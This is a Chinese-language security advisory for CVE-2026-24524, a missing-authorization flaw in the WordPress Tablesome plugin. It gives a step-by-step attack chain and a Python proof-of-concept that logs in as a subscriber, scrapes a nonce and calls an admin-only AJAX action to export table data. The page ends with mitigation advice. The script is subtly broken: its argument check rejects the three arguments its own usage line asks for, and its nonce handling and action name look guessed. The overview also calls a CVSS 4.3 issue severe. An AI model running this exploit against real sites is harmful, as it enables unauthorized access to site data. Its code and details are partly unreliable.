CVE-2026-24524 WordPress Tablesome插件缺少授权访问控制漏洞

漏洞信息

漏洞编号

CVE-2026-24524

漏洞类型

访问控制/授权缺失

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Essekia Tablesome (WordPress Plugin)

漏洞概述

CVE-2026-24524是WordPress Tablesome插件中的一个严重授权缺失漏洞。该漏洞允许低权限用户（如订阅者角色）绕过正常的访问控制检查，访问或操作本应需要更高权限才能访问的功能和数据。Tablesome是WordPress平台上广受欢迎的数据表格管理插件，用于创建和管理动态数据表格。由于该插件在处理用户权限验证时存在缺陷，攻击者可以利用此漏洞获取未授权的访问权限，进而可能访问敏感数据、修改表格内容或在某些情况下实现进一步的权限提升。该漏洞的CVSS评分为4.3，属于中危级别，主要影响是通过网络远程利用，且不需要用户交互，但需要攻击者具有低权限账户。

技术细节

该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别。具体来说，Tablesome插件在多个关键功能点缺少适当的权限检查。具体技术细节包括：1) 插件的AJAX处理函数未正确验证用户的角色和能力；2) 某些敏感API端点缺少nonce令牌验证或验证不充分；3) 数据库查询操作未进行权限层级检查，允许低权限用户执行本应仅管理员可执行的操作。攻击者可以通过构造特定的HTTP请求，利用WordPress内置的wp_ajax钩子调用这些未受保护的函数。由于WordPress的AJAX处理机制默认对所有登录用户开放，攻击者只需拥有一个低权限账户（如订阅者角色），即可触发这些存在缺陷的代码路径。漏洞影响范围涵盖数据读取、表格配置修改以及潜在的数据篡改等操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用WordPress CMS，然后确认是否安装了Tablesome插件及其版本（需<=1.2.8）

STEP 2

步骤2: 低权限账户获取

攻击者创建一个低权限账户（如订阅者角色Subscriber）或利用已有的低权限账户进行后续攻击

STEP 3

步骤3: 构造恶意请求

攻击者分析Tablesome插件的AJAX端点，构造针对未授权功能的HTTP请求，绕过权限检查直接调用管理员级别的操作

STEP 4

步骤4: 权限绕过执行

通过发送精心构造的AJAX请求（包含表ID和必要的参数），利用插件缺少的授权检查机制，执行本应需要管理员权限的操作

STEP 5

步骤5: 数据访问或篡改

成功绕过授权后，攻击者可以访问敏感表格数据、导出数据、或在某些情况下修改表格配置和内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urljoin

# CVE-2026-24524 PoC - Missing Authorization in Tablesome Plugin
# Target: WordPress site with Tablesome plugin <= 1.2.8

def exploit_tablesome(target_url, username, password):
    """
    Exploit for CVE-2026-24524: Missing Authorization vulnerability
    in Essekia Tablesome plugin
    """
    session = requests.Session()
    
    # Get WordPress nonce for login
    login_url = urljoin(target_url, 'wp-login.php')
    
    # Login as low-privilege user
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print('[-] Login failed')
        return False
    
    print('[+] Login successful as low-privilege user')
    
    # Get admin nonce from tablesome admin page
    admin_url = urljoin(target_url, 'wp-admin/admin.php?page=tablesome')
    resp = session.get(admin_url)
    
    # Extract nonce (simplified - in real scenario, parse HTML properly)
    nonce = ''
    if 'tablesome' in resp.text:
        import re
        nonce_match = re.search(r'nonce":"([a-zA-Z0-9]+)"', resp.text)
        if nonce_match:
            nonce = nonce_match.group(1)
    
    # Exploit: Access admin-only function via AJAX without proper authorization
    ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php')
    
    # Try to access/export tablesome data without admin privileges
    exploit_data = {
        'action': 'tablesome_get_table_data',  # Unprotected admin action
        'nonce': nonce,
        'table_id': '1',  # Target table ID
        'security': nonce
    }
    
    resp = session.post(ajax_url, data=exploit_data)
    
    if resp.status_code == 200:
        print('[+] Exploit successful - Unauthorized access granted')
        print(f'[+] Response: {resp.text[:500]}')
        return True
    else:
        print('[-] Exploit may have failed or target not vulnerable')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        print(f'Example: python {sys.argv[0]} http://example.com/ subscriber password123')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_tablesome(target, user, pwd)

影响范围

Tablesome Plugin <= 1.2.8

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制WordPress注册功能，仅允许受信任的用户注册；2) 使用WordPress安全插件（如Wordfence）监控异常的用户行为和AJAX请求；3) 临时禁用Tablesome插件如果不需要其功能；4) 实施Web应用防火墙（WAF）规则，监控和阻止针对/wp-admin/admin-ajax.php的异常请求；5) 增强日志监控，及时发现未授权的访问尝试。